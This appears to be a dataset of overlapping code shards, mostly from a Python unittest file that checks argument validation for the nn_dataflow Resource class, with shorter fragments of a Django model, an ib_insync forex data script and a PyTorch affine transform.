"_ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=0, dram_bandwidth=128, no_time_mux=False,",
") def test_invalid_array_bus_width(self): ''' Invalid array_bus_width. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*array_bus_width.*'): _ =",
"src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=0, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_bandwidth(self): '''",
"ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A",
"def setUp(self): self.proc_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC) self.dram_region = NodeRegion(dim=PhyDim2(2, 2),",
".*no_time_mux.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128,",
"see <https://opensource.org/licenses/BSD-3-Clause>. \"\"\" import unittest from nn_dataflow.core import NodeRegion from nn_dataflow.core import PhyDim2",
"dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_proc_region_dram(self):",
"software: you can redistribute it and/or modify it under the terms of the",
"= Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=None, )",
"MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the BSD-3 License for more",
"setUp(self): self.proc_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC) self.dram_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0,",
"src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) self.assertTupleEqual(resource.proc_region.dim, (2, 2),",
"If not, see <https://opensource.org/licenses/BSD-3-Clause>. \"\"\" import unittest from nn_dataflow.core import NodeRegion from nn_dataflow.core",
"size_regf=512, array_bus_width=8, dram_bandwidth=-3, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region,",
"this program. If not, see <https://opensource.org/licenses/BSD-3-Clause>. \"\"\" import unittest from nn_dataflow.core import NodeRegion",
"origin=PhyDim2(0, 0), type=NodeRegion.PROC) self.dram_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.src_data_region = NodeRegion(dim=PhyDim2(2,",
"size_regf=(512,), array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_array_bus_width(self): ''' Invalid array_bus_width. ''' with self.assertRaisesRegexp(TypeError,",
"dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=None, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'):",
"array_bus_width. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16,",
"type=NodeRegion.DRAM) self.dst_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 1), type=NodeRegion.DRAM) def test_valid_args(self): ''' Valid arguments.",
"dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=0, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_bandwidth(self): ''' Invalid dram_bandwidth.",
") self.assertTupleEqual(resource.proc_region.dim, (2, 2), 'proc_region') self.assertTupleEqual(resource.dram_region.dim, (2, 2), 'dram_region') self.assertTupleEqual(resource.dim_array, (16, 16), 'dim_array')",
"self.src_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.dst_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 1),",
"dram_bandwidth=128, no_time_mux=False, ) def test_invalid_proc_region_dram(self): ''' Invalid proc_region with type DRAM. ''' with",
"dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_proc_region_dram(self): ''' Invalid proc_region",
"program. If not, see <https://opensource.org/licenses/BSD-3-Clause>. \"\"\" import unittest from nn_dataflow.core import NodeRegion from",
"test_invalid_dram_region_proc(self): ''' Invalid dram_region with type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_.*type.*'): _",
"self.proc_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC) self.dram_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0),",
"2), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region_proc(self):",
"in the hope that it will be useful, but WITHOUT ANY WARRANTY; without",
".*dram_.*type.*'): _ = Resource(proc_region=self.proc_region, dram_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16),",
"def test_invalid_size_regf(self): ''' Invalid size_regf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_regf.*'): _ = Resource(proc_region=self.proc_region,",
"''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_gbuf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16),",
"dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region(self): ''' Invalid",
"Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=None, no_time_mux=False, ) with",
"array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_regf(self): ''' Invalid size_regf. ''' with self.assertRaisesRegexp(TypeError, 'Resource:",
"origin=PhyDim2(0, 0), type=NodeRegion.DRAM), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False,",
"Resource(proc_region=PhyDim2(2, 2), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, )",
"src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region(self): '''",
"16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dim_array(self): ''' Invalid dim_array. '''",
"= Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=PhyDim2(2, 1), dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False,",
"''' Invalid dram_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_region.*'): _ = Resource(proc_region=self.proc_region, dram_region=PhyDim2(2, 2),",
"dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=1.2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError,",
"_ = Resource(proc_region=PhyDim2(2, 2), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128,",
"dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=None, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError,",
"origin=PhyDim2(0, 0), type=NodeRegion.PROC), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, )",
"BSD-3 License for more details. You should have received a copy of the",
"of the Modified BSD-3 License as published by the Open Source Initiative. This",
"no_time_mux=False, ) def test_invalid_array_bus_width(self): ''' Invalid array_bus_width. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*array_bus_width.*'): _",
"size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region_proc(self): ''' Invalid dram_region with type DRAM.",
".*size_gbuf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=(131072,), size_regf=512, array_bus_width=8, dram_bandwidth=128,",
"dram_bandwidth=0, no_time_mux=False, ) def test_invalid_no_time_mux(self): ''' Invalid no_time_mux. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*no_time_mux.*'):",
"dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(TypeError, 'Resource: .*dst_data_.*'):",
"16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=0, no_time_mux=False, ) def test_invalid_no_time_mux(self): ''' Invalid no_time_mux. '''",
"test_invalid_dim_array(self): ''' Invalid dim_array. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dim_array.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region,",
"array_bus_width=8, dram_bandwidth=-3, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region,",
"self.assertRaisesRegexp(TypeError, 'Resource: .*dim_array.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=(16, 16), size_gbuf=131072, size_regf=512,",
"details. You should have received a copy of the Modified BSD-3 License along",
"''' with self.assertRaisesRegexp(ValueError, 'Resource: .*proc_.*type.*'): _ = Resource(proc_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM), dram_region=self.dram_region,",
"''' with self.assertRaisesRegexp(TypeError, 'Resource: .*no_time_mux.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16),",
"2), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def",
"'no_time_mux') def test_invalid_proc_region(self): ''' Invalid proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*proc_region.*'): _ =",
"DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*proc_.*type.*'): _ = Resource(proc_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM),",
"Modified BSD-3 License along with this program. If not, see <https://opensource.org/licenses/BSD-3-Clause>. \"\"\" import",
"hope that it will be useful, but WITHOUT ANY WARRANTY; without even the",
"proc_region with type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*proc_.*type.*'): _ = Resource(proc_region=NodeRegion(dim=PhyDim2(2, 2),",
"Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=-3, no_time_mux=False, ) with",
"the Open Source Initiative. This program is distributed in the hope that it",
"''' Valid arguments. ''' resource = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072,",
"self.assertEqual(resource.dram_bandwidth, 128, 'dram_bandwidth') self.assertFalse(resource.no_time_mux, 'no_time_mux') def test_invalid_proc_region(self): ''' Invalid proc_region. ''' with self.assertRaisesRegexp(TypeError,",
"2), origin=PhyDim2(0, 0), type=NodeRegion.PROC), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False,",
"0), type=NodeRegion.DRAM) self.src_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.dst_data_region = NodeRegion(dim=PhyDim2(2, 1),",
"size_gbuf=131072, size_regf=512, array_bus_width=-2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region,",
"import unittest from nn_dataflow.core import NodeRegion from nn_dataflow.core import PhyDim2 from nn_dataflow.core import",
"dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region_proc(self): ''' Invalid",
"Invalid src/dst_proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*src_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=PhyDim2(2, 1),",
"src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_gbuf(self): '''",
".*dst_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=PhyDim2(2, 1), dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8,",
"size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) self.assertTupleEqual(resource.proc_region.dim, (2, 2), 'proc_region') self.assertTupleEqual(resource.dram_region.dim, (2, 2), 'dram_region')",
"= NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.src_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 0), type=NodeRegion.DRAM)",
"should have received a copy of the Modified BSD-3 License along with this",
"nn_dataflow.core import NodeRegion from nn_dataflow.core import PhyDim2 from nn_dataflow.core import Resource class TestResource(unittest.TestCase):",
"_ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=(512,), array_bus_width=8, dram_bandwidth=128, no_time_mux=False,",
"dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=-3, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'):",
"(2, 2), 'proc_region') self.assertTupleEqual(resource.dram_region.dim, (2, 2), 'dram_region') self.assertTupleEqual(resource.dim_array, (16, 16), 'dim_array') self.assertEqual(resource.size_gbuf, 131072,",
"1), dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dim_array(self): ''' Invalid",
"You should have received a copy of the Modified BSD-3 License along with",
"no_time_mux. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*no_time_mux.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16,",
"= Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, )",
"self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512,",
"useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or",
"= Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, )",
"from nn_dataflow.core import NodeRegion from nn_dataflow.core import PhyDim2 from nn_dataflow.core import Resource class",
"dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) self.assertTupleEqual(resource.proc_region.dim, (2, 2), 'proc_region') self.assertTupleEqual(resource.dram_region.dim,",
"_ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=None, no_time_mux=False,",
"is distributed in the hope that it will be useful, but WITHOUT ANY",
"dim_array=(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_gbuf(self): ''' Invalid size_gbuf.",
"16), size_gbuf=(131072,), size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_regf(self): ''' Invalid size_regf. '''",
"0), type=NodeRegion.DRAM), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, )",
"Invalid size_regf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_regf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region,",
"array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_array_bus_width(self): ''' Invalid array_bus_width. ''' with self.assertRaisesRegexp(TypeError, 'Resource:",
".*proc_region.*'): _ = Resource(proc_region=PhyDim2(2, 2), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8,",
"no_time_mux=False, ) def test_invalid_dram_region(self): ''' Invalid dram_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_region.*'): _",
"array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region_proc(self): ''' Invalid dram_region with type DRAM. '''",
"_ = Resource(proc_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072,",
".*dram_region.*'): _ = Resource(proc_region=self.proc_region, dram_region=PhyDim2(2, 2), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8,",
"array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(TypeError, 'Resource: .*dst_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region,",
"16), size_gbuf=131072, size_regf=512, array_bus_width=0, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_bandwidth(self): ''' Invalid dram_bandwidth. '''",
"1), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.dst_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 1), type=NodeRegion.DRAM) def test_valid_args(self):",
"FITNESS FOR A PARTICULAR PURPOSE. See the BSD-3 License for more details. You",
"= Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=0, dram_bandwidth=128, no_time_mux=False, )",
"dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=1.2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'):",
"= Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=PhyDim2(2, 1), dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False,"
] |
[
"models from eworkshop.utils.models import TimeModel class ServiceType(TimeModel): service_name = models.CharField(max_length=10, blank=False) def __str__(self)",
"TimeModel class ServiceType(TimeModel): service_name = models.CharField(max_length=10, blank=False) def __str__(self) -> str: return self.service_name",
"import models from eworkshop.utils.models import TimeModel class ServiceType(TimeModel): service_name = models.CharField(max_length=10, blank=False) def",
"from django.db import models from eworkshop.utils.models import TimeModel class ServiceType(TimeModel): service_name = models.CharField(max_length=10,",
"eworkshop.utils.models import TimeModel class ServiceType(TimeModel): service_name = models.CharField(max_length=10, blank=False) def __str__(self) -> str:",
"django.db import models from eworkshop.utils.models import TimeModel class ServiceType(TimeModel): service_name = models.CharField(max_length=10, blank=False)",
"from eworkshop.utils.models import TimeModel class ServiceType(TimeModel): service_name = models.CharField(max_length=10, blank=False) def __str__(self) ->",
"import TimeModel class ServiceType(TimeModel): service_name = models.CharField(max_length=10, blank=False) def __str__(self) -> str: return",
"<reponame>frankfern/eWorkshop-api from django.db import models from eworkshop.utils.models import TimeModel class ServiceType(TimeModel): service_name ="
] |
[
"Forex('EURUSD') bars = ib.reqHistoricalData(contract, endDateTime='', durationStr='30 D', barSizeSetting='1 hour', whatToShow='MIDPOINT', useRTH=True) # convert",
"bars = ib.reqHistoricalData(contract, endDateTime='', durationStr='30 D', barSizeSetting='1 hour', whatToShow='MIDPOINT', useRTH=True) # convert to",
"7497, clientId=1) contract = Forex('EURUSD') bars = ib.reqHistoricalData(contract, endDateTime='', durationStr='30 D', barSizeSetting='1 hour',",
"contract = Forex('EURUSD') bars = ib.reqHistoricalData(contract, endDateTime='', durationStr='30 D', barSizeSetting='1 hour', whatToShow='MIDPOINT', useRTH=True)",
"endDateTime='', durationStr='30 D', barSizeSetting='1 hour', whatToShow='MIDPOINT', useRTH=True) # convert to pandas dataframe: df",
"import * ib = IB() ib.connect('127.0.0.1', 7497, clientId=1) contract = Forex('EURUSD') bars =",
"= ib.reqHistoricalData(contract, endDateTime='', durationStr='30 D', barSizeSetting='1 hour', whatToShow='MIDPOINT', useRTH=True) # convert to pandas",
"durationStr='30 D', barSizeSetting='1 hour', whatToShow='MIDPOINT', useRTH=True) # convert to pandas dataframe: df =",
"clientId=1) contract = Forex('EURUSD') bars = ib.reqHistoricalData(contract, endDateTime='', durationStr='30 D', barSizeSetting='1 hour', whatToShow='MIDPOINT',",
"ib.reqHistoricalData(contract, endDateTime='', durationStr='30 D', barSizeSetting='1 hour', whatToShow='MIDPOINT', useRTH=True) # convert to pandas dataframe:",
"whatToShow='MIDPOINT', useRTH=True) # convert to pandas dataframe: df = util.df(bars) print(df[['date', 'open', 'high',",
"= Forex('EURUSD') bars = ib.reqHistoricalData(contract, endDateTime='', durationStr='30 D', barSizeSetting='1 hour', whatToShow='MIDPOINT', useRTH=True) #",
"barSizeSetting='1 hour', whatToShow='MIDPOINT', useRTH=True) # convert to pandas dataframe: df = util.df(bars) print(df[['date',",
"ib = IB() ib.connect('127.0.0.1', 7497, clientId=1) contract = Forex('EURUSD') bars = ib.reqHistoricalData(contract, endDateTime='',",
"ib_insync import * ib = IB() ib.connect('127.0.0.1', 7497, clientId=1) contract = Forex('EURUSD') bars",
"hour', whatToShow='MIDPOINT', useRTH=True) # convert to pandas dataframe: df = util.df(bars) print(df[['date', 'open',",
"= IB() ib.connect('127.0.0.1', 7497, clientId=1) contract = Forex('EURUSD') bars = ib.reqHistoricalData(contract, endDateTime='', durationStr='30",
"* ib = IB() ib.connect('127.0.0.1', 7497, clientId=1) contract = Forex('EURUSD') bars = ib.reqHistoricalData(contract,",
"ib.connect('127.0.0.1', 7497, clientId=1) contract = Forex('EURUSD') bars = ib.reqHistoricalData(contract, endDateTime='', durationStr='30 D', barSizeSetting='1",
"useRTH=True) # convert to pandas dataframe: df = util.df(bars) print(df[['date', 'open', 'high', 'low',",
"from ib_insync import * ib = IB() ib.connect('127.0.0.1', 7497, clientId=1) contract = Forex('EURUSD')",
"IB() ib.connect('127.0.0.1', 7497, clientId=1) contract = Forex('EURUSD') bars = ib.reqHistoricalData(contract, endDateTime='', durationStr='30 D',",
"D', barSizeSetting='1 hour', whatToShow='MIDPOINT', useRTH=True) # convert to pandas dataframe: df = util.df(bars)",
"# convert to pandas dataframe: df = util.df(bars) print(df[['date', 'open', 'high', 'low', 'close']])"
] |
[
"not isinstance(scale, torch.Tensor): scale = torch.tensor(scale).view(1, -1) self.loc = loc.float() self.scale = scale.float()",
"- self.loc) / self.scale def log_abs_det_jacobian(self, x, y): return torch.log(torch.abs(self.scale.expand(x.size()))).sum(-1) def get_parameters(self): return",
"self.scale * x def inverse(self, y): return (y - self.loc) / self.scale def",
"self.loc) / self.scale def log_abs_det_jacobian(self, x, y): return torch.log(torch.abs(self.scale.expand(x.size()))).sum(-1) def get_parameters(self): return {'type':'affine',",
"(y - self.loc) / self.scale def log_abs_det_jacobian(self, x, y): return torch.log(torch.abs(self.scale.expand(x.size()))).sum(-1) def get_parameters(self):",
"= torch.tensor(loc).view(1, -1) if not isinstance(scale, torch.Tensor): scale = torch.tensor(scale).view(1, -1) self.loc =",
"import Transform from torch.nn import Parameter import torch class Affine(Transform): def __init__(self, loc=0.0,",
"learnable=True): super().__init__() if not isinstance(loc, torch.Tensor): loc = torch.tensor(loc).view(1, -1) if not isinstance(scale,",
"loc=0.0, scale=1.0, learnable=True): super().__init__() if not isinstance(loc, torch.Tensor): loc = torch.tensor(loc).view(1, -1) if",
"if not isinstance(scale, torch.Tensor): scale = torch.tensor(scale).view(1, -1) self.loc = loc.float() self.scale =",
"if learnable: self.loc = Parameter(self.loc) self.scale = Parameter(self.scale) def forward(self, x): return self.loc",
"isinstance(scale, torch.Tensor): scale = torch.tensor(scale).view(1, -1) self.loc = loc.float() self.scale = scale.float() self.n_dims",
"Parameter(self.loc) self.scale = Parameter(self.scale) def forward(self, x): return self.loc + self.scale * x",
"inverse(self, y): return (y - self.loc) / self.scale def log_abs_det_jacobian(self, x, y): return",
"torch.tensor(scale).view(1, -1) self.loc = loc.float() self.scale = scale.float() self.n_dims = len(loc) if learnable:",
"self.scale = scale.float() self.n_dims = len(loc) if learnable: self.loc = Parameter(self.loc) self.scale =",
"scale=1.0, learnable=True): super().__init__() if not isinstance(loc, torch.Tensor): loc = torch.tensor(loc).view(1, -1) if not",
"import torch class Affine(Transform): def __init__(self, loc=0.0, scale=1.0, learnable=True): super().__init__() if not isinstance(loc,",
"torch.tensor(loc).view(1, -1) if not isinstance(scale, torch.Tensor): scale = torch.tensor(scale).view(1, -1) self.loc = loc.float()",
"x): return self.loc + self.scale * x def inverse(self, y): return (y -",
"+ self.scale * x def inverse(self, y): return (y - self.loc) / self.scale",
"loc.float() self.scale = scale.float() self.n_dims = len(loc) if learnable: self.loc = Parameter(self.loc) self.scale",
"__init__(self, loc=0.0, scale=1.0, learnable=True): super().__init__() if not isinstance(loc, torch.Tensor): loc = torch.tensor(loc).view(1, -1)",
"if not isinstance(loc, torch.Tensor): loc = torch.tensor(loc).view(1, -1) if not isinstance(scale, torch.Tensor): scale",
"len(loc) if learnable: self.loc = Parameter(self.loc) self.scale = Parameter(self.scale) def forward(self, x): return",
"learnable: self.loc = Parameter(self.loc) self.scale = Parameter(self.scale) def forward(self, x): return self.loc +",
"* x def inverse(self, y): return (y - self.loc) / self.scale def log_abs_det_jacobian(self,",
"/ self.scale def log_abs_det_jacobian(self, x, y): return torch.log(torch.abs(self.scale.expand(x.size()))).sum(-1) def get_parameters(self): return {'type':'affine', 'loc':self.loc.detach().numpy(),",
".transform import Transform from torch.nn import Parameter import torch class Affine(Transform): def __init__(self,",
"from torch.nn import Parameter import torch class Affine(Transform): def __init__(self, loc=0.0, scale=1.0, learnable=True):",
